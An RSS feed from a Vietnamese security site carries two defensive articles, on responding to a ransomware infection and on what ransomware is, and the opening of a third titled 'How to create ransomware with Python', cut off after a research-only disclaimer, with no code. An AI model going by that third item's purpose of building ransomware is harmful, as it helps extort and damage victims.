<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>ransomware &#8211; AnonyViet</title>
	<atom:link href="https://anonyviet.com/tag/ransomware/feed/" rel="self" type="application/rss+xml" />
	<link>https://anonyviet.com</link>
	<description>Webiste chia sẻ kiến thức công nghệ thông tin, mạng máy tính, bảo mật phổ biến nhất Việt Nam. Luôn cập nhật tin tức, thủ thuật nóng hổi nhất</description>
	<lastBuildDate>Thu, 24 Jul 2025 16:57:15 +0000</lastBuildDate>
	<language>vi</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://anonyviet.com/wp-content/uploads/2018/10/cropped-ico-logo-75x75.png</url>
	<title>ransomware &#8211; AnonyViet</title>
	<link>https://anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>10 bước cần thực hiện khi bị nhiễm Ransomware mã hóa dữ liệu</title>
		<link>https://anonyviet.com/10-buoc-can-thuc-hien-khi-bi-nhiem-ransomware-ma-hoa-du-lieu/</link>
					<comments>https://anonyviet.com/10-buoc-can-thuc-hien-khi-bi-nhiem-ransomware-ma-hoa-du-lieu/#respond</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Fri, 22 Jul 2022 23:23:40 +0000</pubDate>
				<category><![CDATA[Mẹo Vặt Máy Tính]]></category>
		<category><![CDATA[an toàn thông tin]]></category>
		<category><![CDATA[bảo mật]]></category>
		<category><![CDATA[mã hóa dữ liệu]]></category>
		<category><![CDATA[ransomware]]></category>
		<category><![CDATA[virus đòi tiện chuộc]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=39117</guid>

					<description><![CDATA[Hãy tưởng tượng bạn đang hoàn thành những bước cuối cùng cho một báo cáo công việc quan trọng thì đột nhiên bạn mất quyền truy cập vào tất cả các tệp. Hoặc bạn nhận được một thông báo lỗi kỳ lạ yêu cầu bạn gửi Bitcoin để mở khóa máy tính của bạn. Bất [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Hãy tưởng tượng bạn đang hoàn thành những bước cuối cùng cho một báo cáo công việc quan trọng thì đột nhiên bạn mất quyền truy cập vào tất cả các tệp. Hoặc bạn nhận được một thông báo lỗi kỳ lạ yêu cầu bạn gửi Bitcoin để mở khóa máy tính của bạn.</strong></p>
<p><img fetchpriority="high" decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/01/ransomware.jpg" alt="10 bước quan trọng cần thực hiện khi bị nhiễm Ransomware mã hóa dữ liệu" width="600" height="300" title="10 bước cần thực hiện khi bị nhiễm Ransomware mã hóa dữ liệu 4"></p>
<p>Bất kể kịch bản là gì, một cuộc tấn công bằng ransomware có thể tàn phá máy tính của bạn. Hãy cùng tìm hiểu thêm về ransomware và các bước bạn có thể thực hiện sau khi bị dính ransomware.</p>
<h2>Ransomware là gì?</h2>
<p>Ransomware là một cuộc tấn công độc hại khiến dữ liệu của bạn bị khóa hoặc mã hóa bởi tội phạm mạng ẩn danh. Những kẻ tấn công sẽ cung cấp hướng dẫn về cách giải mã các tệp và cuối cùng nạn nhân có thể lấy lại tệp của họ sau khi trả trước một khoản “tiền chuộc” khổng lồ.</p>
<p>Một số hoạt động nhất định có thể dẫn đến một cuộc tấn công bằng ransomware. Ở một mức độ lớn, hai chiến thuật độc hại, được gọi là &#8220;<a href="https://anonyviet.com/tag/social-engineering/">social engineering</a>&#8221; và &#8220;<a href="https://vietnetco.vn/apt-security-phong-chong-tan-cong-mang-apt-nang-cao/3186.html#:~:text=M%E1%BB%9F%20r%E1%BB%99ng%20%C4%91%E1%BB%8Ba%20b%C3%A0n%20khai,tr%E1%BB%8Dng%20(c%E1%BA%A3%20User%20Administrator)." target="_blank" rel="noopener">lateral movement</a>&#8220;, có thể là thủ phạm.</p>
<p>Trong một số trường hợp, tội phạm mạng có thể tiến hành một cuộc tấn công ransomware trước và thực hiện việc đòi tiền chuộc sau đó, do đó cuộc tấn công thực sự có thể xảy ra vài ngày sau khi xâm nhập mạng.</p>
<h2>Các bước cần thực hiện sau khi bị Ransomware tấn công</h2>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/01/ransomware-man-.jpg" alt="10 bước cần thực hiện khi bị nhiễm Ransomware mã hóa dữ liệu 3" width="750" height="375" title="10 bước cần thực hiện khi bị nhiễm Ransomware mã hóa dữ liệu 5"></p>
<p>Phòng ngừa là hình thức phòng thủ tốt nhất khi nói đến ransomware. Nếu bạn hoặc công ty của bạn không có các biện pháp bảo mật mạnh mẽ, thì bạn rất dễ bị dính ransomware.</p>
<p>Một cuộc tấn công ransomware có thể rất nguy hiểm. Nhưng nếu bạn hành động kịp thời ngay lập tức sau khi dính ransomware, bạn có thể giảm thiểu một số thiệt hại. Dưới đây là 10 bước bạn nên thực hiện sau khi bị tấn công bằng ransomware.</p>
<h3>1. Giữ bình tĩnh và thu thập thông tin</h3>
<p>Thật khó để giữ bình tĩnh khi bạn không thể truy cập các tệp quan trọng trên máy tính của mình. Nhưng bước đầu tiên bạn cần làm sau khi bị tấn công bởi ransomware là không hoảng sợ và giữ thái độ bình tĩnh.</p>
<p>Hầu hết mọi người sẽ lao vào trả tiền chuộc trước khi phân tích mức độ nghiêm trọng của tình huống họ đang gặp phải. Giữ bình tĩnh và lùi lại một bước đôi khi có thể mở ra cơ hội đàm phán với kẻ tấn công.</p>
<h3>2. Chụp ảnh Ghi chú Ransomware</h3>
<p>Bước thứ hai là ngay lập tức chụp ảnh ghi chú ransomware trên màn hình của bạn thông qua điện thoại hoặc máy ảnh. Nếu có thể, hãy chụp ảnh màn hình trên máy bị ảnh hưởng.</p>
<p>Điều này sẽ giúp bạn báo cảnh sát và sẽ đẩy nhanh quá trình khắc phục sự cố.</p>
<h3>3. Cô lập máy bị ảnh hưởng</h3>
<p>Điều quan trọng là phải cô lập các hệ thống bị ảnh hưởng càng sớm càng tốt. Ransomware thường quét mạng mục tiêu và lây truyền sang các hệ thống khác.</p>
<p>Tốt nhất là tách các hệ thống bị ảnh hưởng khỏi mạng để ngăn chặn sự lây nhiễm và ngăn chặn ransomware lây lan.</p>
<h3>4. Tìm công cụ giải mã</h3>
<p>May mắn thay, có rất nhiều công cụ giải mã có sẵn trên mạng, ở những nơi chẳng hạn như <a href="https://www.nomoreransom.org/" target="_blank" rel="noopener">No More Ransom</a>.</p>
<p>Nếu bạn đã biết tên chủng ransomware của mình, thì bạn có thể chỉ cần nhập tên nó vào trang web và tìm kiếm công cụ giải mã phù hợp.</p>
<h3>5. Vô hiệu hóa các nhiệm vụ bảo trì</h3>
<p>Bạn nên tắt ngay các tác vụ bảo trì tự động, chẳng hạn như xóa tệp tạm thời và sao lưu nhật ký, trên các hệ thống bị ảnh hưởng. Điều này sẽ ngăn những tác vụ này can thiệp vào các tệp có thể hữu ích cho việc phân tích pháp y và điều tra.</p>
<h3>6. Ngắt kết nối sao lưu</h3>
<p>Hầu hết các chủng ransomware hiện đại ngay lập tức vô hiệu hóa quá trình sao lưu để ngăn cản các nỗ lực khôi phục.</p>
<p>Do đó, bạn hoặc tổ chức của bạn bắt buộc phải bảo mật các bản sao lưu của mình bằng cách tách chúng khỏi phần còn lại của mạng. Bạn cũng nên khóa quyền truy cập vào các hệ thống sao lưu cho đến khi giải quyết được vấn đề.</p>
<h3>7. Xác định biến thể tấn công</h3>
<p>Để xác định chủng loại ransomware, bạn có thể sử dụng các dịch vụ miễn phí như công cụ nhận dạng ransomware trực tuyến của Emsisoft hoặc ID Ransomware.</p>
<p>Các dịch vụ này cho phép người dùng tải lên một mẫu tệp được mã hóa, bất kỳ ghi chú đòi tiền chuộc nào bị bỏ lại và thông tin liên hệ của kẻ tấn công, nếu có. Việc phân tích thông tin này có thể xác định loại phần mềm tống tiền đã tấn công người dùng.</p>
<h3>8. Đặt lại mật khẩu</h3>
<p>Thay đổi tất cả mật khẩu trực tuyến và mật khẩu tài khoản khi bạn đã ngắt kết nối các hệ thống bị ảnh hưởng khỏi mạng. Sau khi loại bỏ ransomware, bạn nên đổi tất cả các mật khẩu hệ thống một lần nữa.</p>
<h3>9. Báo cáo Ransomware</h3>
<p>Thời điểm bạn nhận thấy mình bị tấn công bằng ransomware, hãy nhớ liên hệ với cơ quan pháp luật. Ngay cả khi cơ quan thực thi pháp luật không thể giúp giải mã các tệp của bạn, thì ít nhất họ cũng có thể giúp những người khác tránh được số phận tương tự.</p>
<h3>10. Quyết định trả tiền chuộc hay không</h3>
<p>Quyết định trả tiền cho ransomware không phải là một quyết định dễ dàng và đi kèm với những ưu và nhược điểm của nó. Chỉ trả tiền cho ransomware nếu bạn đã dùng hết các cáchkhác và việc mất dữ liệu gây thiệt hại cho bạn hoặc công ty của bạn nhiều hơn là trả tiền chuộc.</p>
<h2>Mẹo để giảm thiểu các cuộc tấn công bằng Ransomware</h2>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/01/what-is-ransomware-featured.jpg" alt="10 bước cần thực hiện khi bị nhiễm Ransomware mã hóa dữ liệu 4" width="600" height="300" title="10 bước cần thực hiện khi bị nhiễm Ransomware mã hóa dữ liệu 6"></p>
<p>Sự gia tăng của tội phạm mạng đang thúc đẩy các tổ chức phải suy nghĩ lại về các chiến lược bảo mật của họ. Dưới đây là một số mẹo có thể giúp bạn giảm thiểu các cuộc tấn công ransomware.</p>
<ul>
<li><strong>Hạn chế đặc quyền quản trị:</strong> Hãy thận trọng khi cung cấp đặc quyền quản trị vì tài khoản quản trị viên có quyền truy cập vào mọi thứ, bao gồm cả việc thay đổi cấu hình hoặc bỏ qua các cài đặt bảo mật quan trọng. Luôn sử dụng <a href="https://vi.theastrologypage.com/principle-least-privilege" target="_blank" rel="noopener">Nguyên tắc Đặc quyền Ít nhất (PLOP)</a> khi cấp bất kỳ loại quyền truy cập nào.</li>
<li><strong>Vá các ứng dụng:</strong> Nếu bạn phát hiện ra một lỗ hổng bảo mật, hãy vá nó càng sớm càng tốt để ngăn chặn tin tặc lợi dụn nó.</li>
<li><strong>Sử dụng danh sách cho phép ứng dụng:</strong> Danh sách cho phép ứng dụng là một kỹ thuật giảm thiểu mối đe dọa chủ động cho phép các chương trình được ủy quyền trước chạy trong khi tất cả các chương trình khác vẫn bị chặn theo mặc định. Nó giúp xác định các nỗ lực thực thi mã độc hại và cũng ngăn chặn các cài đặt trái phép.</li>
<li><strong>Cảnh giác với email:</strong> Email dễ bị tấn công bởi ransomware nhất, do đó, bắt buộc phải tăng cường bảo mật email. Cổng email an toàn đảm bảo tất cả các liên lạc qua email được lọc cùng với việc kích hoạt tính năng bảo vệ URL và sandbox để chủ động xác định các mối đe dọa. Cũng như các mưu đồ lừa đảo qua email cần được ngăn chặn, bạn cũng cần chú ý đến việc bảo vệ sau khi gửi.</li>
<li><strong>Đào tạo nhận thức bảo mật:</strong> Vì hành vi của con người bắt đầu tất cả các cuộc tấn công ransomware, nên việc đào tạo nhận thức về bảo mật là điều bắt buộc đối với tất cả nhân viên. Khóa đào tạo này là bắt buộc vì nó dạy người dùng phân biệt các mối đe dọa thực sự với dữ liệu hợp pháp.</li>
<li><strong>Sử dụng MFA:</strong> Xác thực đa yếu tố (MFA) bổ sung thêm một lớp bảo mật vì nó yêu cầu hai hoặc nhiều bằng chứng để đăng nhập vào các giải pháp truy cập từ xa, như ngân hàng trực tuyến hoặc các hành động đặc quyền khác, cần thông tin nhạy cảm.</li>
<li><strong>Sao lưu hàng ngày:</strong> Sao lưu dữ liệu thường xuyên là một phần không thể thiếu của kế hoạch khôi phục sau sự cố. Trong trường hợp bị tấn công bởi ransomware, bạn có thể khôi phục và truy cập vào dữ liệu đã sao lưu. Bạn luôn có thể giải mã dữ liệu gốc của mình bằng cách khôi phục các bản sao lưu trước đó.</li>
</ul>
<p>Bên cạnh việc hết sức cẩn thận, hãy luôn nhớ rằng các cuộc tấn công bằng phần mềm độc hại, bao gồm cả ransomware, đều nhắm vào phần mềm chưa được vá lỗi và lỗi thời. Vì vậy, điều quan trọng nhất là tất cả phần mềm chạy trên máy của bạn phải được cập nhật.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Tôi nên làm gì đầu tiên nếu nghi ngờ máy tính của mình bị nhiễm ransomware?</h3>
<p>Điều quan trọng nhất là giữ bình tĩnh và cô lập máy tính bị ảnh hưởng khỏi mạng để ngăn chặn sự lây lan.  Sau đó, chụp ảnh màn hình ghi chú đòi tiền chuộc và tìm kiếm công cụ giải mã trên trang web No More Ransom.</p>
<h3>Có nên trả tiền chuộc cho hacker không?</h3>
<p>Việc trả tiền chuộc không được khuyến khích, vì không đảm bảo bạn sẽ lấy lại dữ liệu và có thể khuyến khích các hoạt động tội phạm mạng.  Hãy thử các phương pháp khác như sử dụng công cụ giải mã trước khi cân nhắc đến việc trả tiền.</p>
<h3>Làm thế nào để giảm thiểu nguy cơ bị tấn công bởi ransomware?</h3>
<p>Cập nhật phần mềm thường xuyên, sử dụng phần mềm diệt virus đáng tin cậy, cảnh giác với email đáng ngờ, hạn chế quyền quản trị và thực hiện đào tạo nhận thức bảo mật cho người dùng là những biện pháp phòng ngừa hiệu quả.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/10-buoc-can-thuc-hien-khi-bi-nhiem-ransomware-ma-hoa-du-lieu/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Ransomware là gì?</title>
		<link>https://anonyviet.com/ransomware-la-gi/</link>
					<comments>https://anonyviet.com/ransomware-la-gi/#respond</comments>
		
		<dc:creator><![CDATA[Dark Sniffer]]></dc:creator>
		<pubDate>Fri, 15 Jul 2022 09:23:30 +0000</pubDate>
				<category><![CDATA[Virus-Trojan-Rat]]></category>
		<category><![CDATA[mã độc]]></category>
		<category><![CDATA[ransomware]]></category>
		<category><![CDATA[virus]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=34219</guid>

					<description><![CDATA[Ransomware là một loại phần mềm độc hại chặn người dùng khỏi hệ thống máy tính và mã hóa tệp của họ, cho phép kẻ tấn công kiểm soát mọi thông tin cá nhân được lưu trữ trên thiết bị của nạn nhân. Tội phạm mạng sau đó sẽ dùng dữ liệu nhạy cảm của [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Ransomware là một loại phần mềm độc hại chặn người dùng khỏi hệ thống máy tính và mã hóa tệp của họ, cho phép kẻ tấn công kiểm soát mọi thông tin cá nhân được lưu trữ trên thiết bị của nạn nhân. Tội phạm mạng sau đó sẽ dùng dữ liệu nhạy cảm của nạn nhân để đe dọa cho đến khi đòi được tiền chuộc. Vậy nên mới có cái tên “ransom” (tiền chuộc) trong ransomware.</strong></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2021/09/what-is-ransomware-hero.jpg" alt="Ransomware là gì?" width="533" height="300" title="Ransomware là gì? 8"></p>
<h2>Ransomware hoạt động như thế nào?</h2>
<p>Đặc điểm nổi bật của ransomware là nó được sử dụng như một công cụ tống tiền và có nhiều cách khác nhau để tội phạm mạng sử dụng loại phần mềm độc hại này để giành quyền truy cập vào thiết bị của nạn nhân. Một trong những cách phổ biến nhất là email lừa đảo — nạn nhân được gửi email có đính kèm file độc hại và sẽ lây nhiễm vào máy tính của nạn nhân khi chúng được mở.</p>
<p>Sau khi chiếm đoạt thành công máy tính của nạn nhân, những kẻ tấn công tiếp tục mã hóa một số hoặc tất cả các tệp của người dùng, như tài liệu Word, PDF, hình ảnh, cơ sở dữ liệu,&#8230; Phần mềm tống tiền cũng có thể khai thác toàn bộ lỗ hổng mạng, có thể lây lan sang các hệ thống khác và thậm chí trên toàn bộ tổ chức.</p>
<p>Vào cuối cuộc tấn công, tin tặc sẽ gửi cho nạn nhân một tin nhắn giải thích rằng các tệp của họ hiện đã bị mã hóa và chỉ có thể được giải mã nếu trả tiền chuộc. Tiền chuộc thường được yêu cầu dưới hình thức thanh toán Bitcoin không theo dõi được để trả cho kẻ tấn công.</p>
<h2>Mục tiêu của Ransomware?</h2>
<p>Mục tiêu ransomware có thể là người tiêu dùng cá nhân, các doanh nghiệp vừa và nhỏ hoặc các tổ chức doanh nghiệp lớn hơn. Việc bọn tội phạm chọn mục tiêu như thế nào thường phụ thuộc vào cơ hội. Ví dụ: họ có thể nhắm đến các nhóm có đội bảo mật nhỏ hơn như các trường đại học do khả năng bảo mật yếu hơn và mức độ chia sẻ tệp cao.</p>
<p>Một mục tiêu phổ biến khác là các tổ chức có nhiều khả năng trả tiền chuộc trong thời gian ngắn hơn. Các cơ quan chính phủ, ngân hàng, công ty luật và cơ sở y tế đều thuộc loại này, vì họ có thể cần quyền truy cập ngay lập tức vào các tệp khách hàng nhạy cảm và sẽ sẵn sàng trả tiền chuộc hơn nếu đổi lại sự im lặng về các vi phạm tài chính của tổ chức đó.</p>
<p>Cuối cùng, tội phạm thường nhắm mục tiêu vào các tổ chức công ty lớn với hy vọng kiếm được nhiều tiền hơn. Các cuộc tấn công ransomware trong danh mục này thường tập trung vào các doanh nghiệp ở Anh, Hoa Kỳ và Canada do số lượng sử dụng máy tính cá nhân cao.</p>
<h2>Các loại Ransomware</h2>
<p>Trong khi có vô số chủng loại ransomware, hầu hết các cuộc tấn công thuộc hai loại chính: Crypto ransomware và locker ransomware.</p>
<ul>
<li><strong>Crypto ransomware</strong> hoạt động bằng cách mã hóa các tệp máy tính nhạy cảm của nạn nhân và yêu cầu tiền chuộc trước khi có thể khôi phục tệp.</li>
<li><strong>Locker ransomware</strong> không mã hóa các tập tin. Thay vào đó, nó xâm phạm các chức năng máy tính cơ bản và khóa nạn nhân hoàn toàn khỏi thiết bị của họ cho đến khi trả tiền chuộc.</li>
</ul>
<p>Mức độ nghiêm trọng do một cuộc tấn công ransomware gây ra sẽ phụ thuộc vào biến thể của ransomware đang được sử dụng và các phương pháp giải quyết sẽ khác nhau tùy thuộc vào loại ransomware.</p>
<h2 class="TnITTtw-tpart TnITTtw-t">Ví dụ về ransomware</h2>
<p>Mặc dù ransomware chỉ mới xuất hiện được vài thập kỷ, nhưng nó đã có những bước phát triển nhanh chóng trong 5 năm qua nhờ sự tiến bộ của các phương thức thanh toán không thể theo dõi như Bitcoin. Dưới đây là một số vụ tấn công kinh khủng nhất từ trước đến nay.</p>
<h3>1. CryptoLocker</h3>
<p><a href="https://ladigi.vn/cryptolocker-la-gi-chi-tiet-ve-cryptolocker-moi-nhat-2021" target="_blank" rel="noopener">CryptoLocker</a> là một trong những cuộc tấn công ransomware trên diện rộng đầu tiên sử dụng mã hóa khóa công khai. Cuộc tấn công năm vào 2013 này đã đặt nền móng cho ransomware hiện tại và đã xâm nhập hơn 500.000 máy từ năm 2013 đến năm 2014. Thanh toán được yêu cầu trả dưới dạng Bitcoin và vào thời điểm đó, các chuyên gia tin rằng phần mềm độc hại đang được sử dụng là không thể xâm nhập.</p>
<p>Đến năm 2014, một công ty bảo mật cuối cùng cũng có quyền truy cập vào một máy chủ liên quan đến cuộc tấn công và khôi phục thành công các khóa mã hóa, nhưng những kẻ tấn công vẫn cố gắng tống tiền gần 3 triệu USD trước khi chúng phá sản.</p>
<h3>2.WannaCry</h3>
<p>WannaCry là một cuộc tấn công năm 2017, lây lan trên 150 quốc gia nhằm vào các lỗ hổng bảo mật trong phần mềm Windows. Cuộc tấn công đã lây nhiễm cho 230.000 thiết bị trên toàn thế giới, khóa người dùng khỏi máy tính của họ cho đến khi trả tiền chuộc bằng Bitcoin.</p>
<p>Cuộc tấn công WannaCry hoạt động bằng cách khai thác một lỗ hổng hệ điều hành được phát hiện là đã xuất hiện từ rất lâu trước khi cuộc tấn công xảy ra và sự kiện này đã làm sáng tỏ hệ thống bảo mật lỗi thời. Trên toàn cầu, WannaCry gây ra thiệt hại tài chính trung bình 4 tỷ USD.</p>
<h3>3. NotPetya</h3>
<p>NotPetya là một cuộc tấn công toàn cầu năm 2017 chủ yếu nhắm vào Ukraine. Ban đầu, nó được cho là một dòng Petya ransomware mới &#8211; một dạng phần mềm độc hại lây nhiễm vào máy tính mục tiêu, mã hóa dữ liệu và đòi tiền chuộc bằng bitcoin để khôi phục tệp. Tuy nhiên, NotPetya sau đó được coi là một dòng ransomware hoàn toàn mới được gọi là wiper, với mục đích duy nhất là phá hủy dữ liệu bị xâm phạm thay vì trả lại để đòi tiền chuộc.</p>
<h3>4. BadRabbit</h3>
<p>BadRabbit là một dòng ransomware đã lây nhiễm cho các công ty truyền thông trên khắp nước Nga và Đông Âu vào năm 2019. Cuộc tấn công được thực hiện thông qua việc phát tán bản cập nhật Adobe Flash giả mạo để lây nhiễm thiết bị của nạn nhân khi tải xuống, hướng họ đến trang thanh toán nơi đòi tiền chuộc bằng Bitcoin. Không giống như cuộc tấn công NotPetya, BadRabbit sẽ giải mã file nếu nhận được khoản tiền chuộc.</p>
<h2>Cách bảo vệ bản thân khỏi Ransomware</h2>
<p>Như với bất kỳ mối đe dọa an ninh mạng nào, các phương pháp phòng ngừa hầu như luôn tốt hơn là tìm cách chữa trị khi đã quá muộn. Thực hiện theo các phương pháp phòng ngừa tốt nhất dưới đây để giảm thiểu nguy cơ bị tấn công.</p>
<ul>
<li><strong>Sao lưu dữ liệu:</strong> Cách tốt nhất để tránh bị mã hóa các tệp nhạy cảm là sao lưu dữ liệu định kỳ. Tốt nhất là thực hiện việc này trên đám mây hoặc bằng ổ cứng ngoài. Nếu bạn gặp phải một cuộc tấn công, bạn chỉ cần xóa thiết bị của mình và cài đặt lại các tệp bằng bản sao lưu đó.</li>
<li><strong>Bảo vệ email:</strong> các chiến dịch lừa đảo qua email là một trong những phương tiện phổ biến nhất để phát tán ransomware, vì vậy việc bảo mật email của bạn là rất quan trọng. Ở cấp độ tổ chức, việc trang bị cho nhân viên của bạn khả năng nhận ra các email đáng ngờ có thể ngăn chặn một cuộc tấn công trước khi nó có thể gây ra bất kỳ thiệt hại nào.</li>
<li><strong>Luôn cập nhật hệ thống:</strong> Thường xuyên cập nhật phần mềm của bạn là một trong những cách đơn giản nhất để ngăn chặn bất kỳ cuộc tấn công mạng nào. Mỗi bản cập nhật phần mềm có sẵn đều giảm thiểu các lỗ hổng bảo mật mới được tìm thấy, khiến những kẻ tấn công khó khai thác phần mềm lỗi thời hơn.</li>
<li><strong>Không bao giờ nhấp vào các liên kết đáng ngờ:</strong> Cho dù đó là tệp đính kèm trong email hay một liên kết được tìm thấy trên web, đừng bao giờ nhấp vào các liên kết trong thư rác hoặc các trang web không xác định. Chỉ cần nhấp vào một liên kết độc hại cũng có thể bắt đầu quá trình tải xuống tự động, lây nhiễm vào máy tính của bạn ngay lập tức.</li>
<li><strong>Không tiết lộ thông tin cá nhân:</strong> Không bao giờ trả lời email hoặc tin nhắn văn bản từ một nguồn không xác định yêu cầu thông tin cá nhân, ngay cả khi họ tự nhận là người mà bạn tin tưởng.</li>
<li><strong>Sử dụng phần mềm bảo mật:</strong> Cài đặt phần mềm bảo mật đáng tin cậy là một trong những cách dễ nhất để giữ an toàn cho dữ liệu của bạn. Để tăng cường khả năng bảo vệ, hãy chọn một phần mềm cung cấp nhiều hơn các tính năng chống virus— một số có khả năng phát hiện mối đe dọa đa nền tảng có thể giữ an toàn cho tất cả các thiết bị của bạn.</li>
</ul>
<h2>Cách đối phó với các cuộc tấn công bằng Ransomware</h2>
<p>Nếu bạn đã bị tấn công bằng ransomware, thì thời gian là điều cốt yếu và điều quan trọng nhất là phải hành động càng nhanh càng tốt. Bạn có thể thực hiện một số bước để giảm thiểu thiệt hại.</p>
<ul>
<li><strong>Cách ly thiết bị bị nhiễm virus:</strong> Để đảm bảo an toàn cho mạng, bộ nhớ dùng chung và các thiết bị khác của bạn, quan trọng là bạn phải ngắt kết nối thiết bị bị ảnh hưởng khỏi mạng càng sớm càng tốt. Điều này có thể ngăn các thiết bị được kết nối khác bị nhiễm virus.</li>
<li><strong>Đánh giá tất cả các thiết bị được kết nối khác:</strong> Việc cô lập thiết bị bị nhiễm không phải lúc nào cũng đảm bảo rằng phần mềm tống tiền không tồn tại ở nơi khác trên mạng của bạn. Để ngăn nó lây lan, hãy kiểm tra tất cả các thiết bị được kết nối khác và ngắt kết nối bất kỳ thiết bị nào đang hoạt động đáng ngờ.</li>
<li><strong>Báo cáo với cơ quan chức năng:</strong> Ransomware là một loại tội phạm giống như bất kỳ loại tội phạm nào khác cần được báo cáo cho cơ quan thực thi pháp luật. Các nhà chức trách liên quan cũng có quyền truy cập vào các công cụ để truy xuất dữ liệu bị đánh cắp và xác định vị trí của những kẻ tấn công.</li>
</ul>
<h2>Ransomware có thể bị loại bỏ không?</h2>
<p>Việc loại bỏ ransomware tùy thuộc vào loại ransomware mà bạn đang xử lý và bạn sẽ cần phải cài đặt phần mềm bảo mật trước khi bị tấn công — nhưng trong một số trường hợp, bạn có thể xóa được. Đây là những gì bạn có thể làm:</p>
<ul>
<li>Ngắt kết nối thiết bị bị nhiễm khỏi Internet càng sớm càng tốt để ngăn phần mềm tống tiền phát tán.</li>
<li>Quét các tệp độc hại và xóa chúng bằng phần mềm bảo mật. Nếu ransomware khóa màn hình máy tính, thì có thể không thực hiện được.</li>
<li>Lấy lại quyền truy cập vào dữ liệu của bạn bằng công cụ giải mã được kết nối với phần mềm bảo mật. Bước này sẽ phụ thuộc vào phần mềm bảo mật bạn có.</li>
<li>Khôi phục các tệp đã mất của bạn nếu bạn có bản sao lưu dữ liệu bên ngoài.</li>
</ul>
<p>Nếu bạn không thể thực hiện các bước trên, tùy chọn còn lại duy nhất là đặt lại máy tính của bạn về cài đặt gốc. Bạn có thể <a href="https://anonyviet.com/cach-tao-usb-reset-password-windows-10/">đọc bài viết này</a> để biết cách reset win bằng usb.</p>
<p>Ransomware gây ra mối đe dọa đáng kể cho người tiêu dùng cũng như các công ty, và những kẻ tấn công đang thực hiện các cuộc tấn công ngày càng tinh vi khi công nghệ tiến bộ. Khi nói đến việc bảo vệ bản thân, phòng ngừa hầu như luôn tốt hơn là tìm cách chữa sau cuộc tấn công — điều này có nghĩa là giáo dục bản thân về ransomware và cách sử dụng thiết bị một cách an toàn là điều cần thiết để ngăn chặn mọi cuộc tấn công. Để tăng cường bảo mật, hãy đảm bảo có phần mềm chống virus trên tất cả các thiết bị của bạn để giảm nguy cơ lây nhiễm.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Ransomware là gì và nó hoạt động như thế nào?</h3>
<p>Ransomware là phần mềm độc hại mã hóa tệp của bạn, khóa bạn khỏi hệ thống, và đòi tiền chuộc để giải mã.  Nó thường lây lan qua email lừa đảo hoặc các liên kết độc hại.</p>
<h3>Tôi có thể bị ảnh hưởng bởi ransomware như thế nào?</h3>
<p>Bạn có thể bị nhiễm ransomware bằng cách mở tệp đính kèm email độc hại, nhấp vào liên kết độc hại, hoặc thông qua các lỗ hổng bảo mật trong phần mềm của bạn.</p>
<h3>Làm thế nào để tôi bảo vệ mình khỏi ransomware?</h3>
<p>Sao lưu dữ liệu thường xuyên, cập nhật phần mềm, sử dụng phần mềm diệt virus, và tránh nhấp vào các liên kết hoặc tệp đính kèm đáng ngờ là những bước quan trọng để bảo vệ mình.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/ransomware-la-gi/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cách tạo Ransomware bằng Python</title>
		<link>https://anonyviet.com/cach-tao-ransomware-bang-python/</link>
					<comments>https://anonyviet.com/cach-tao-ransomware-bang-python/#comments</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Tue, 12 Jul 2022 21:52:09 +0000</pubDate>
				<category><![CDATA[Virus-Trojan-Rat]]></category>
		<category><![CDATA[Mã hóa]]></category>
		<category><![CDATA[ransomware]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=41230</guid>

					<description><![CDATA[Tuyên bố từ chối trách nhiệm: Bài viết này chỉ dành cho mục đích nghiên cứu, đừng phá hoại bất kỳ máy tính nào ngoại trừ máy tính của bạn. Nếu bạn cố gắng tạo ra một con ransomware thực sự, thì bạn đang vi phạm pháp luật và bạn sẽ phải ngồi tù. Đi [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><em><strong>Tuyên bố từ chối trách nhiệm: Bài viết này chỉ dành cho mục đích nghiên cứu, đừng phá hoại bất kỳ máy tính nào ngoại trừ máy tính của bạn. Nếu bạn cố gắng tạo ra một con <a href="https://anonyviet.com/tag/ransomware/">ransomware</a> thực sự, thì bạn đang vi phạm pháp luật và bạn sẽ phải ngồi tù. Đi theo chính đạo, tà đạo dễ sa ngã vào con đường tội lỗi lắm nha anh em.</strong></em></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/04/Screenshot-from-2022-04-22-22-04-22.jpg" alt="Cách tạo Ransomware bằng Python" width="546" height="333" title="Cách tạo Ransomware bằng Python 18"></p>
<p>P/s: Bài viết được dịch từ Febi Mudiyanto, và mình sẽ sử dụng ngôi thứ nhất để các bạn dễ hiểu hơn.</p>
<h2>Ransomware là gì?</h2>
